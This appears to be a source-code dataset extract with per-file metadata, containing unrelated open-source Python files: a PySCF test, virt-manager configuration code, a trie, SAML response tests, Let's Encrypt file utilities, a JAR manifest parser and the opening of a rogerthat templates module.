repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated |
---|---|---|---|---|---|---|---|---|---|---|
sunqm/pyscf | pyscf/eph/test/test_uhf.py | 1 | 2089 | #!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pyscf import scf, gto
from pyscf.eph import eph_fd, uhf
import numpy as np
import unittest
mol = gto.M()
mol.atom = [['O', [0.000000000000, -0.000000000775, 0.923671924285]],
['H', [-0.000000000000, -1.432564848017, 2.125164039823]],
['H', [0.000000000000, 1.432564848792, 2.125164035930]]]
mol.unit = 'Bohr'
mol.basis = 'sto3g'
mol.verbose=4
mol.build() # this is a pre-computed relaxed geometry
class KnownValues(unittest.TestCase):
def test_finite_diff_uhf_eph(self):
mf = scf.UHF(mol)
mf.conv_tol = 1e-16
mf.conv_tol_grad = 1e-10
mf.kernel()
grad = mf.nuc_grad_method().kernel()
self.assertTrue(abs(grad).max()<1e-5)
mat, omega = eph_fd.kernel(mf)
matmo, _ = eph_fd.kernel(mf, mo_rep=True)
myeph = uhf.EPH(mf)
eph, _ = myeph.kernel()
ephmo, _ = myeph.kernel(mo_rep=True)
for i in range(len(omega)):
self.assertTrue(min(np.linalg.norm(eph[:,i]-mat[:,i]),np.linalg.norm(eph[:,i]+mat[:,i]))<1e-5)
self.assertTrue(min(abs(eph[:,i]-mat[:,i]).max(), abs(eph[:,i]+mat[:,i]).max())<1e-5)
self.assertTrue(min(np.linalg.norm(ephmo[:,i]-matmo[:,i]),np.linalg.norm(ephmo[:,i]+matmo[:,i]))<1e-5)
self.assertTrue(min(abs(ephmo[:,i]-matmo[:,i]).max(), abs(ephmo[:,i]+matmo[:,i]).max())<1e-5)
if __name__ == '__main__':
print("Full Tests for UHF")
unittest.main()
| apache-2.0 | -3,297,742,572,155,970,000 | 36.981818 | 114 | 0.632839 | false |
noskill/virt-manager | virtManager/config.py | 1 | 25087 | #
# Copyright (C) 2006, 2012-2014 Red Hat, Inc.
# Copyright (C) 2006 Daniel P. Berrange <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import os
import logging
from gi.repository import Gio
from gi.repository import GLib
from gi.repository import Gtk
from virtinst import CPU
from .keyring import vmmKeyring, vmmSecret
running_config = None
class SettingsWrapper(object):
def __init__(self, settings_id):
self._root = settings_id
self._settings = Gio.Settings.new(self._root)
self._settingsmap = {"": self._settings}
self._handler_map = {}
for child in self._settings.list_children():
childschema = self._root + "." + child
self._settingsmap[child] = Gio.Settings.new(childschema)
def _parse_key(self, key):
value = key.strip("/")
settingskey = ""
if "/" in value:
settingskey, value = value.rsplit("/", 1)
return settingskey, value
def make_vm_settings(self, key):
settingskey = self._parse_key(key)[0]
if settingskey in self._settingsmap:
return True
schema = self._root + ".vm"
path = "/" + self._root.replace(".", "/") + key.rsplit("/", 1)[0] + "/"
self._settingsmap[settingskey] = Gio.Settings.new_with_path(schema,
path)
return True
def _find_settings(self, key):
settingskey, value = self._parse_key(key)
return self._settingsmap[settingskey], value
def _cmd_helper(self, cmd, key, *args, **kwargs):
settings, key = self._find_settings(key)
return getattr(settings, cmd)(key, *args, **kwargs)
def notify_add(self, key, cb, *args, **kwargs):
settings, key = self._find_settings(key)
def wrapcb(*ignore):
return cb(*args, **kwargs)
ret = settings.connect("changed::%s" % key, wrapcb, *args, **kwargs)
self._handler_map[ret] = settings
return ret
def notify_remove(self, h):
settings = self._handler_map.pop(h)
return settings.disconnect(h)
def get(self, key):
return self._cmd_helper("get_value", key).unpack()
def set(self, key, value, *args, **kwargs):
fmt = self._cmd_helper("get_value", key).get_type_string()
return self._cmd_helper("set_value", key,
GLib.Variant(fmt, value),
*args, **kwargs)
class vmmConfig(object):
# key names for saving last used paths
CONFIG_DIR_IMAGE = "image"
CONFIG_DIR_ISO_MEDIA = "isomedia"
CONFIG_DIR_FLOPPY_MEDIA = "floppymedia"
CONFIG_DIR_SAVE = "save"
CONFIG_DIR_RESTORE = "restore"
CONFIG_DIR_SCREENSHOT = "screenshot"
CONFIG_DIR_FS = "fs"
# Metadata mapping for browse types. Prob shouldn't go here, but works
# for now.
browse_reason_data = {
CONFIG_DIR_IMAGE : {
"enable_create" : True,
"storage_title" : _("Locate or create storage volume"),
"local_title" : _("Locate existing storage"),
"dialog_type" : Gtk.FileChooserAction.SAVE,
"choose_button" : Gtk.STOCK_OPEN,
},
CONFIG_DIR_ISO_MEDIA : {
"enable_create" : False,
"storage_title" : _("Locate ISO media volume"),
"local_title" : _("Locate ISO media"),
},
CONFIG_DIR_FLOPPY_MEDIA : {
"enable_create" : False,
"storage_title" : _("Locate floppy media volume"),
"local_title" : _("Locate floppy media"),
},
CONFIG_DIR_FS : {
"enable_create" : False,
"storage_title" : _("Locate directory volume"),
"local_title" : _("Locate directory volume"),
"dialog_type" : Gtk.FileChooserAction.SELECT_FOLDER,
},
}
CONSOLE_SCALE_NEVER = 0
CONSOLE_SCALE_FULLSCREEN = 1
CONSOLE_SCALE_ALWAYS = 2
DEFAULT_XEN_IMAGE_DIR = "/var/lib/xen/images"
DEFAULT_XEN_SAVE_DIR = "/var/lib/xen/dump"
DEFAULT_VIRT_IMAGE_DIR = "/var/lib/libvirt/images"
DEFAULT_VIRT_SAVE_DIR = "/var/lib/libvirt"
def __init__(self, appname, cliconfig, test_first_run=False):
self.appname = appname
self.appversion = cliconfig.__version__
self.conf_dir = "/org/virt-manager/%s/" % self.appname
self.ui_dir = os.path.join(cliconfig.asset_dir, "ui")
self.test_first_run = bool(test_first_run)
self.conf = SettingsWrapper("org.virt-manager.virt-manager")
# We don't create it straight away, since we don't want
# to block the app pending user authorization to access
# the keyring
self.keyring = None
self.default_qemu_user = cliconfig.default_qemu_user
self.stable_defaults = cliconfig.stable_defaults
self.preferred_distros = cliconfig.preferred_distros
self.hv_packages = cliconfig.hv_packages
self.libvirt_packages = cliconfig.libvirt_packages
self.askpass_package = cliconfig.askpass_package
self.default_graphics_from_config = cliconfig.default_graphics
self.with_bhyve = cliconfig.with_bhyve
self.cli_usbredir = None
self.default_storage_format_from_config = "qcow2"
self.cpu_default_from_config = "host-cpu-model"
self.default_console_resizeguest = 0
self.default_add_spice_usbredir = "yes"
self._objects = []
self.support_inspection = self.check_inspection()
self._spice_error = None
global running_config
running_config = self
def check_inspection(self):
try:
# Check we can open the Python guestfs module.
from guestfs import GuestFS # pylint: disable=import-error
GuestFS(close_on_exit=False)
return True
except:
return False
# General app wide helpers (gsettings agnostic)
def get_appname(self):
return self.appname
def get_appversion(self):
return self.appversion
def get_ui_dir(self):
return self.ui_dir
def embeddable_graphics(self):
ret = ["vnc", "spice"]
return ret
def remove_notifier(self, h):
self.conf.notify_remove(h)
# Used for debugging reference leaks, we keep track of all objects
# come and go so we can do a leak report at app shutdown
def add_object(self, obj):
self._objects.append(obj)
def remove_object(self, obj):
self._objects.remove(obj)
def get_objects(self):
return self._objects[:]
def _make_pervm_key(self, uuid, key):
return "/vms/%s%s" % (uuid.replace("-", ""), key)
def listen_pervm(self, uuid, key, *args, **kwargs):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
return self.conf.notify_add(key, *args, **kwargs)
def set_pervm(self, uuid, key, *args, **kwargs):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
ret = self.conf.set(key, *args, **kwargs)
return ret
def get_pervm(self, uuid, key):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
return self.conf.get(key)
###################
# General helpers #
###################
# Manager stats view preferences
def is_vmlist_guest_cpu_usage_visible(self):
return self.conf.get("/vmlist-fields/cpu-usage")
def is_vmlist_host_cpu_usage_visible(self):
return self.conf.get("/vmlist-fields/host-cpu-usage")
def is_vmlist_memory_usage_visible(self):
return self.conf.get("/vmlist-fields/memory-usage")
def is_vmlist_disk_io_visible(self):
return self.conf.get("/vmlist-fields/disk-usage")
def is_vmlist_network_traffic_visible(self):
return self.conf.get("/vmlist-fields/network-traffic")
def set_vmlist_guest_cpu_usage_visible(self, state):
self.conf.set("/vmlist-fields/cpu-usage", state)
def set_vmlist_host_cpu_usage_visible(self, state):
self.conf.set("/vmlist-fields/host-cpu-usage", state)
def set_vmlist_memory_usage_visible(self, state):
self.conf.set("/vmlist-fields/memory-usage", state)
def set_vmlist_disk_io_visible(self, state):
self.conf.set("/vmlist-fields/disk-usage", state)
def set_vmlist_network_traffic_visible(self, state):
self.conf.set("/vmlist-fields/network-traffic", state)
def on_vmlist_guest_cpu_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/cpu-usage", cb)
def on_vmlist_host_cpu_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/host-cpu-usage", cb)
def on_vmlist_memory_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/memory-usage", cb)
def on_vmlist_disk_io_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/disk-usage", cb)
def on_vmlist_network_traffic_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/network-traffic", cb)
# Keys preferences
def get_keys_combination(self):
ret = self.conf.get("/console/grab-keys")
if not ret:
# Left Control + Left Alt
return "65507,65513"
return ret
def set_keys_combination(self, val):
# Val has to be a list of integers
val = ','.join([str(v) for v in val])
self.conf.set("/console/grab-keys", val)
def on_keys_combination_changed(self, cb):
return self.conf.notify_add("/console/grab-keys", cb)
# This key is not intended to be exposed in the UI yet
def get_keyboard_grab_default(self):
return self.conf.get("/console/grab-keyboard")
def set_keyboard_grab_default(self, val):
self.conf.set("/console/grab-keyboard", val)
def on_keyboard_grab_default_changed(self, cb):
return self.conf.notify_add("/console/grab-keyboard", cb)
# Confirmation preferences
def get_confirm_forcepoweroff(self):
return self.conf.get("/confirm/forcepoweroff")
def get_confirm_poweroff(self):
return self.conf.get("/confirm/poweroff")
def get_confirm_pause(self):
return self.conf.get("/confirm/pause")
def get_confirm_removedev(self):
return self.conf.get("/confirm/removedev")
def get_confirm_interface(self):
return self.conf.get("/confirm/interface-power")
def get_confirm_unapplied(self):
return self.conf.get("/confirm/unapplied-dev")
def get_confirm_delstorage(self):
return self.conf.get("/confirm/delete-storage")
def set_confirm_forcepoweroff(self, val):
self.conf.set("/confirm/forcepoweroff", val)
def set_confirm_poweroff(self, val):
self.conf.set("/confirm/poweroff", val)
def set_confirm_pause(self, val):
self.conf.set("/confirm/pause", val)
def set_confirm_removedev(self, val):
self.conf.set("/confirm/removedev", val)
def set_confirm_interface(self, val):
self.conf.set("/confirm/interface-power", val)
def set_confirm_unapplied(self, val):
self.conf.set("/confirm/unapplied-dev", val)
def set_confirm_delstorage(self, val):
self.conf.set("/confirm/delete-storage", val)
# System tray visibility
def on_view_system_tray_changed(self, cb):
return self.conf.notify_add("/system-tray", cb)
def get_view_system_tray(self):
return self.conf.get("/system-tray")
def set_view_system_tray(self, val):
self.conf.set("/system-tray", val)
# Stats history and interval length
def get_stats_history_length(self):
return 120
def get_stats_update_interval(self):
interval = self.conf.get("/stats/update-interval")
if interval < 1:
return 1
return interval
def set_stats_update_interval(self, interval):
self.conf.set("/stats/update-interval", interval)
def on_stats_update_interval_changed(self, cb):
return self.conf.notify_add("/stats/update-interval", cb)
# Disable/Enable different stats polling
def get_stats_enable_cpu_poll(self):
return self.conf.get("/stats/enable-cpu-poll")
def get_stats_enable_disk_poll(self):
return self.conf.get("/stats/enable-disk-poll")
def get_stats_enable_net_poll(self):
return self.conf.get("/stats/enable-net-poll")
def get_stats_enable_memory_poll(self):
return self.conf.get("/stats/enable-memory-poll")
def set_stats_enable_cpu_poll(self, val):
self.conf.set("/stats/enable-cpu-poll", val)
def set_stats_enable_disk_poll(self, val):
self.conf.set("/stats/enable-disk-poll", val)
def set_stats_enable_net_poll(self, val):
self.conf.set("/stats/enable-net-poll", val)
def set_stats_enable_memory_poll(self, val):
self.conf.set("/stats/enable-memory-poll", val)
def on_stats_enable_cpu_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-cpu-poll", cb, row)
def on_stats_enable_disk_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-disk-poll", cb, row)
def on_stats_enable_net_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-net-poll", cb, row)
def on_stats_enable_memory_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-memory-poll", cb, row)
# VM Console preferences
def on_console_accels_changed(self, cb):
return self.conf.notify_add("/console/enable-accels", cb)
def get_console_accels(self):
console_pref = self.conf.get("/console/enable-accels")
if console_pref is None:
console_pref = False
return console_pref
def set_console_accels(self, pref):
self.conf.set("/console/enable-accels", pref)
def on_console_scaling_changed(self, cb):
return self.conf.notify_add("/console/scaling", cb)
def get_console_scaling(self):
return self.conf.get("/console/scaling")
def set_console_scaling(self, pref):
self.conf.set("/console/scaling", pref)
def on_console_resizeguest_changed(self, cb):
return self.conf.notify_add("/console/resize-guest", cb)
def get_console_resizeguest(self):
val = self.conf.get("/console/resize-guest")
if val == -1:
val = self.default_console_resizeguest
return val
def set_console_resizeguest(self, pref):
self.conf.set("/console/resize-guest", pref)
def get_auto_redirection(self):
if self.cli_usbredir is not None:
return self.cli_usbredir
return self.conf.get("/console/auto-redirect")
def set_auto_redirection(self, state):
self.conf.set("/console/auto-redirect", state)
# Show VM details toolbar
def get_details_show_toolbar(self):
res = self.conf.get("/details/show-toolbar")
if res is None:
res = True
return res
def set_details_show_toolbar(self, state):
self.conf.set("/details/show-toolbar", state)
# VM details default size
def get_details_window_size(self):
w = self.conf.get("/details/window_width")
h = self.conf.get("/details/window_height")
return (w, h)
def set_details_window_size(self, w, h):
self.conf.set("/details/window_width", w)
self.conf.set("/details/window_height", h)
# New VM preferences
def get_new_vm_sound(self):
return self.conf.get("/new-vm/add-sound")
def set_new_vm_sound(self, state):
self.conf.set("/new-vm/add-sound", state)
def get_graphics_type(self, raw=False):
ret = self.conf.get("/new-vm/graphics-type")
if ret not in ["system", "vnc", "spice"]:
ret = "system"
if ret == "system" and not raw:
return self.default_graphics_from_config
return ret
def set_graphics_type(self, gtype):
self.conf.set("/new-vm/graphics-type", gtype.lower())
def get_add_spice_usbredir(self, raw=False):
ret = self.conf.get("/new-vm/add-spice-usbredir")
if ret not in ["system", "yes", "no"]:
ret = "system"
if not raw and not self.get_graphics_type() == "spice":
return "no"
if ret == "system" and not raw:
return self.default_add_spice_usbredir
return ret
def set_add_spice_usbredir(self, val):
self.conf.set("/new-vm/add-spice-usbredir", val)
def get_default_storage_format(self, raw=False):
ret = self.conf.get("/new-vm/storage-format")
if ret not in ["default", "raw", "qcow2"]:
ret = "default"
if ret == "default" and not raw:
return self.default_storage_format_from_config
return ret
def set_storage_format(self, typ):
self.conf.set("/new-vm/storage-format", typ.lower())
def get_default_cpu_setting(self, raw=False, for_cpu=False):
ret = self.conf.get("/new-vm/cpu-default")
whitelist = [CPU.SPECIAL_MODE_HOST_MODEL_ONLY,
CPU.SPECIAL_MODE_HOST_MODEL,
CPU.SPECIAL_MODE_HV_DEFAULT]
if ret not in whitelist:
ret = "default"
if ret == "default" and not raw:
ret = self.cpu_default_from_config
if ret not in whitelist:
ret = whitelist[0]
if for_cpu and ret == CPU.SPECIAL_MODE_HOST_MODEL:
# host-model has known issues, so use our 'copy cpu'
# behavior until host-model does what we need
ret = CPU.SPECIAL_MODE_HOST_COPY
return ret
def set_default_cpu_setting(self, val):
self.conf.set("/new-vm/cpu-default", val.lower())
# URL/Media path history
def _url_add_helper(self, gsettings_path, url):
maxlength = 10
urls = self.conf.get(gsettings_path)
if urls is None:
urls = []
if urls.count(url) == 0 and len(url) > 0 and not url.isspace():
# The url isn't already in the list, so add it
urls.insert(0, url)
if len(urls) > maxlength:
del urls[len(urls) - 1]
self.conf.set(gsettings_path, urls)
def add_media_url(self, url):
self._url_add_helper("/urls/urls", url)
def add_kickstart_url(self, url):
self._url_add_helper("/urls/kickstarts", url)
def add_iso_path(self, path):
self._url_add_helper("/urls/isos", path)
def get_media_urls(self):
return self.conf.get("/urls/urls")
def get_kickstart_urls(self):
return self.conf.get("/urls/kickstarts")
def get_iso_paths(self):
return self.conf.get("/urls/isos")
# Whether to ask about fixing path permissions
def add_perms_fix_ignore(self, pathlist):
current_list = self.get_perms_fix_ignore() or []
for path in pathlist:
if path in current_list:
continue
current_list.append(path)
self.conf.set("/paths/perms-fix-ignore", current_list)
def get_perms_fix_ignore(self):
return self.conf.get("/paths/perms-fix-ignore")
# Manager view connection list
def add_conn(self, uri):
if self.test_first_run:
return
uris = self.conf.get("/connections/uris")
if uris is None:
uris = []
if uris.count(uri) == 0:
uris.insert(len(uris) - 1, uri)
self.conf.set("/connections/uris", uris)
def remove_conn(self, uri):
uris = self.conf.get("/connections/uris")
if uris is None:
return
if uris.count(uri) != 0:
uris.remove(uri)
self.conf.set("/connections/uris", uris)
if self.get_conn_autoconnect(uri):
uris = self.conf.get("/connections/autoconnect")
uris.remove(uri)
self.conf.set("/connections/autoconnect", uris)
def get_conn_uris(self):
if self.test_first_run:
return []
return self.conf.get("/connections/uris")
# Manager default window size
def get_manager_window_size(self):
w = self.conf.get("/manager-window-width")
h = self.conf.get("/manager-window-height")
return (w, h)
def set_manager_window_size(self, w, h):
self.conf.set("/manager-window-width", w)
self.conf.set("/manager-window-height", h)
# URI autoconnect
def get_conn_autoconnect(self, uri):
uris = self.conf.get("/connections/autoconnect")
return ((uris is not None) and (uri in uris))
def set_conn_autoconnect(self, uri, val):
if self.test_first_run:
return
uris = self.conf.get("/connections/autoconnect")
if uris is None:
uris = []
if not val and uri in uris:
uris.remove(uri)
elif val and uri not in uris:
uris.append(uri)
self.conf.set("/connections/autoconnect", uris)
# Default directory location dealings
def _get_default_dir_key(self, _type):
if (_type in [self.CONFIG_DIR_ISO_MEDIA,
self.CONFIG_DIR_FLOPPY_MEDIA]):
return "media"
if (_type in [self.CONFIG_DIR_IMAGE,
self.CONFIG_DIR_SCREENSHOT]):
return _type
return None
def get_default_directory(self, conn, _type):
key = self._get_default_dir_key(_type)
path = None
if key:
path = self.conf.get("/paths/%s-default" % key)
if not path:
if (_type == self.CONFIG_DIR_IMAGE or
_type == self.CONFIG_DIR_ISO_MEDIA or
_type == self.CONFIG_DIR_FLOPPY_MEDIA):
path = self.get_default_image_dir(conn)
if (_type == self.CONFIG_DIR_SAVE or
_type == self.CONFIG_DIR_RESTORE):
path = self.get_default_save_dir(conn)
logging.debug("directory for type=%s returning=%s", _type, path)
return path
def set_default_directory(self, folder, _type):
key = self._get_default_dir_key(_type)
if not key:
return
logging.debug("saving directory for type=%s to %s", key, folder)
self.conf.set("/paths/%s-default" % key, folder)
def get_default_image_dir(self, conn):
if conn.is_xen():
return self.DEFAULT_XEN_IMAGE_DIR
if (conn.is_qemu_session() or
not os.access(self.DEFAULT_VIRT_IMAGE_DIR, os.W_OK)):
return os.getcwd()
# Just return the default dir since the intention is that it
# is a managed pool and the user will be able to install to it.
return self.DEFAULT_VIRT_IMAGE_DIR
def get_default_save_dir(self, conn):
if conn.is_xen():
return self.DEFAULT_XEN_SAVE_DIR
elif os.access(self.DEFAULT_VIRT_SAVE_DIR, os.W_OK):
return self.DEFAULT_VIRT_SAVE_DIR
else:
return os.getcwd()
# Keyring / VNC password dealings
def get_secret_name(self, vm):
return "vm-console-" + vm.get_uuid()
def has_keyring(self):
if self.keyring is None:
self.keyring = vmmKeyring()
return self.keyring.is_available()
def get_console_password(self, vm):
if not self.has_keyring():
return ("", "")
username, keyid = vm.get_console_password()
if keyid == -1:
return ("", "")
secret = self.keyring.get_secret(keyid)
if secret is None or secret.get_name() != self.get_secret_name(vm):
return ("", "")
if (secret.attributes.get("hvuri", None) != vm.conn.get_uri() or
secret.attributes.get("uuid", None) != vm.get_uuid()):
return ("", "")
return (secret.get_secret(), username or "")
def set_console_password(self, vm, password, username=""):
if not self.has_keyring():
return
secret = vmmSecret(self.get_secret_name(vm), password,
{"uuid" : vm.get_uuid(),
"hvuri": vm.conn.get_uri()})
keyid = self.keyring.add_secret(secret)
if keyid is None:
return
vm.set_console_password(username, keyid)
| gpl-2.0 | -5,542,892,643,271,892,000 | 35.148415 | 79 | 0.604775 | false |
armsky/Algorithms | Data Structure/trie.py | 1 | 1534 | class TrieNode:
# Initialize your data structure here.
def __init__(self):
self.children = {}
self.is_word = False
class Trie:
def __init__(self):
self.root = TrieNode()
# @param {string} word
# @return {void}
# Inserts a word into the trie.
def insert(self, word):
if word:
node = self.root
for char in word:
child = node.children.get(char)
if not child:
child = TrieNode()
node.children[char] = child
node = child
node.is_word = True
# @param {string} word
# @return {boolean}
# Returns if the word is in the trie.
def search(self, word):
if word:
node = self.root
for char in word:
if char not in node.children:
return False
node = node.children[char]
return node.is_word
else:
return False
# @param {string} prefix
# @return {boolean}
# Returns if there is any word in the trie
# that starts with the given prefix.
def startsWith(self, prefix):
if prefix:
node = self.root
for char in prefix:
if char not in node.children:
return False
node = node.children[char]
return True
return False
trie = Trie()
trie.insert("a")
trie.insert("ab")
print trie.search("a")
print trie.search("ab")
| apache-2.0 | -8,049,908,019,752,421,000 | 25.448276 | 47 | 0.508475 | false |
onelogin/python3-saml | tests/src/OneLogin/saml2_tests/signed_response_test.py | 1 | 2007 | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2021 OneLogin, Inc.
# MIT License
import json
from os.path import dirname, join, exists
import unittest
from onelogin.saml2.response import OneLogin_Saml2_Response
from onelogin.saml2.settings import OneLogin_Saml2_Settings
from onelogin.saml2.utils import OneLogin_Saml2_Utils
class OneLogin_Saml2_SignedResponse_Test(unittest.TestCase):
data_path = join(dirname(__file__), '..', '..', '..', 'data')
def loadSettingsJSON(self):
filename = join(dirname(__file__), '..', '..', '..', 'settings', 'settings1.json')
if exists(filename):
stream = open(filename, 'r')
settings = json.load(stream)
stream.close()
return settings
else:
raise Exception('Settings json file does not exist')
def file_contents(self, filename):
f = open(filename, 'r')
content = f.read()
f.close()
return content
def testResponseSignedAssertionNot(self):
"""
Tests the getNameId method of the OneLogin_Saml2_Response
Case valid signed response, unsigned assertion
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
message = self.file_contents(join(self.data_path, 'responses', 'open_saml_response.xml'))
response = OneLogin_Saml2_Response(settings, OneLogin_Saml2_Utils.b64encode(message))
self.assertEqual('[email protected]', response.get_nameid())
def testResponseAndAssertionSigned(self):
"""
Tests the getNameId method of the OneLogin_Saml2_Response
Case valid signed response, signed assertion
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
message = self.file_contents(join(self.data_path, 'responses', 'simple_saml_php.xml'))
response = OneLogin_Saml2_Response(settings, OneLogin_Saml2_Utils.b64encode(message))
self.assertEqual('[email protected]', response.get_nameid())
| mit | -5,244,504,662,315,447,000 | 36.166667 | 97 | 0.658196 | false |
felixrieseberg/lets-encrypt-preview | letsencrypt/le_util.py | 1 | 2392 | """Utilities for all Let's Encrypt."""
import collections
import errno
import os
import stat
from letsencrypt import errors
Key = collections.namedtuple("Key", "file pem")
# Note: form is the type of data, "pem" or "der"
CSR = collections.namedtuple("CSR", "file data form")
def make_or_verify_dir(directory, mode=0o755, uid=0):
"""Make sure directory exists with proper permissions.
:param str directory: Path to a directory.
:param int mode: Directory mode.
:param int uid: Directory owner.
:raises LetsEncryptClientError: if a directory already exists,
but has wrong permissions or owner
:raises OSError: if invalid or inaccessible file names and
paths, or other arguments that have the correct type,
but are not accepted by the operating system.
"""
try:
os.makedirs(directory, mode)
except OSError as exception:
if exception.errno == errno.EEXIST:
if not check_permissions(directory, mode, uid):
raise errors.LetsEncryptClientError(
"%s exists, but does not have the proper "
"permissions or owner" % directory)
else:
raise
def check_permissions(filepath, mode, uid=0):
"""Check file or directory permissions.
:param str filepath: Path to the tested file (or directory).
:param int mode: Expected file mode.
:param int uid: Expected file owner.
:returns: True if `mode` and `uid` match, False otherwise.
:rtype: bool
"""
file_stat = os.stat(filepath)
return stat.S_IMODE(file_stat.st_mode) == mode and file_stat.st_uid == uid
def unique_file(path, mode=0o777):
"""Safely finds a unique file for writing only (by default).
:param str path: path/filename.ext
:param int mode: File mode
:return: tuple of file object and file name
"""
path, tail = os.path.split(path)
count = 0
while True:
fname = os.path.join(path, "%04d_%s" % (count, tail))
try:
file_d = os.open(fname, os.O_CREAT | os.O_EXCL | os.O_RDWR, mode)
return os.fdopen(file_d, "w"), fname
except OSError:
pass
count += 1
def safely_remove(path):
"""Remove a file that may not exist."""
try:
os.remove(path)
except OSError as err:
if err.errno != errno.ENOENT:
raise
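# Illustrative sketch (added for clarity; not part of the original module):
# exercising make_or_verify_dir and unique_file against a throwaway temporary
# directory, then cleaning up with safely_remove.
if __name__ == "__main__":
    import tempfile
    demo_dir = os.path.join(tempfile.mkdtemp(), "le-util-demo")
    make_or_verify_dir(demo_dir, mode=0o755, uid=os.getuid())
    demo_file, demo_name = unique_file(os.path.join(demo_dir, "cert.pem"), mode=0o644)
    demo_file.write("example contents\n")
    demo_file.close()
    safely_remove(demo_name)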
| apache-2.0 | 6,374,653,857,685,918,000 | 27.47619 | 78 | 0.629599 | false |
salimfadhley/jenkinsapi | jenkinsapi/utils/manifest.py | 3 | 3306 | """
This module enables Manifest file parsing.
Copied from
https://chromium.googlesource.com/external/googleappengine/python/+/master
/google/appengine/tools/jarfile.py
"""
import zipfile
_MANIFEST_NAME = 'META-INF/MANIFEST.MF'
class InvalidJarError(Exception):
"""
InvalidJar exception class
"""
pass
class Manifest(object):
"""The parsed manifest from a jar file.
Attributes:
main_section: a dict representing the main (first)
section of the manifest.
Each key is a string that is an attribute, such as
'Manifest-Version', and the corresponding value is a string that
is the value of the attribute, such as '1.0'.
sections: a dict representing the other sections of the manifest.
Each key is a string that is the value of the 'Name' attribute for
the section, and the corresponding value is a dict like the
main_section one, for the other attributes.
"""
def __init__(self, main_section, sections):
self.main_section = main_section
self.sections = sections
def read_manifest(jar_file_name):
"""Read and parse the manifest out of the given jar.
Args:
jar_file_name: the name of the jar from which the manifest is to be read.
Returns:
A parsed Manifest object, or None if the jar has no manifest.
Raises:
IOError: if the jar does not exist or cannot be read.
"""
with zipfile.ZipFile(jar_file_name) as jar:
try:
manifest_string = jar.read(_MANIFEST_NAME).decode('UTF-8')
except KeyError:
return None
return _parse_manifest(manifest_string)
def _parse_manifest(manifest_string):
"""Parse a Manifest object out of the given string.
Args:
manifest_string: a str or unicode that is the manifest contents.
Returns:
A Manifest object parsed out of the string.
Raises:
InvalidJarError: if the manifest is not well-formed.
"""
manifest_string = '\n'.join(manifest_string.splitlines()).rstrip('\n')
section_strings = manifest_string.split('\n\n')
parsed_sections = [_parse_manifest_section(s) for s in section_strings]
main_section = parsed_sections[0]
sections = dict()
try:
for entry in parsed_sections[1:]:
sections[entry['Name']] = entry
except KeyError:
raise InvalidJarError(
'Manifest entry has no Name attribute: %s' % entry)
return Manifest(main_section, sections)
def _parse_manifest_section(section):
"""Parse a dict out of the given manifest section string.
Args:
section: a str or unicode that is the manifest section.
It looks something like this (without the >):
> Name: section-name
> Some-Attribute: some value
> Another-Attribute: another value
Returns:
A dict where the keys are the attributes (here, 'Name', 'Some-Attribute',
'Another-Attribute'), and the values are the corresponding
attribute values.
Raises:
InvalidJarError: if the manifest section is not well-formed.
"""
section = section.replace('\n ', '')
try:
return dict(line.split(': ', 1) for line in section.split('\n'))
except ValueError:
raise InvalidJarError('Invalid manifest %r' % section)
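# Illustrative sketch (added for clarity; not part of the original module):
# parsing a small hand-written manifest string with the helpers above.
if __name__ == '__main__':
    _example = ('Manifest-Version: 1.0\n'
                'Created-By: example\n'
                '\n'
                'Name: com/example/Foo.class\n'
                'SHA-256-Digest: abc123\n')
    _parsed = _parse_manifest(_example)
    print(_parsed.main_section['Manifest-Version'])    # 1.0
    print(sorted(_parsed.sections.keys()))             # ['com/example/Foo.class']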
| mit | -2,833,017,234,510,234,000 | 33.082474 | 79 | 0.659407 | false |
rogerthat-platform/rogerthat-backend | src/rogerthat/templates/__init__.py | 1 | 3596 | # -*- coding: utf-8 -*-
# Copyright 2017 GIG Technology NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.3@@
import logging
import os
from rogerthat import consts
from rogerthat.settings import get_server_settings
from rogerthat.templates.jinja_extensions import TranslateExtension
from rogerthat.translations import DEFAULT_LANGUAGE
from google.appengine.ext.webapp import template
import jinja2
from mcfw.rpc import returns, arguments
TEMPLATES_DIR = os.path.dirname(__file__)
